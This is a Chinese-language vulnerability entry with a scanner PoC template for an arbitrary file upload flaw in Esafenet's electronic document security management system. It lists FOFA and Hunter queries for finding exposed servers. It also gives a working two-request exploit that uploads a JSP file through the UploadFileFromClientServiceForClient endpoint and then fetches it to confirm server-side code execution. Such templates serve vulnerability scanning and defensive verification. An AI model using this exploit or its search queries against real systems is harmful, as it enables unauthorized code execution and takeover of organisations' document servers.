漏洞描述
亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,获取主机权限
FOFA: app="亿赛通-电子文档安全管理系统"
HUNTER: web.title="电子文档安全管理系统"
esafenet-uploadfilefromclientserviceforclient-fileupload: 亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传
PoC代码[已公开]
id: esafenet-uploadfilefromclientserviceforclient-fileupload
info:
name: 亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传
author: zan8in
severity: critical
verified: true
description: |-
亿赛通 电子文档安全管理系统 UploadFileFromClientServiceForClient 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,获取主机权限
FOFA: app="亿赛通-电子文档安全管理系统"
HUNTER: web.title="电子文档安全管理系统"
reference:
- https://mp.weixin.qq.com/s/CtgmNreh-32RyAJgBQsmrA
tags: esafenet,fileupload
created: 2023/09/05
set:
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rules:
r0:
request:
method: POST
path: /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM
body: |
<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
expression: response.status == 200
r1:
request:
method: GET
path: /tttT.jsp
expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()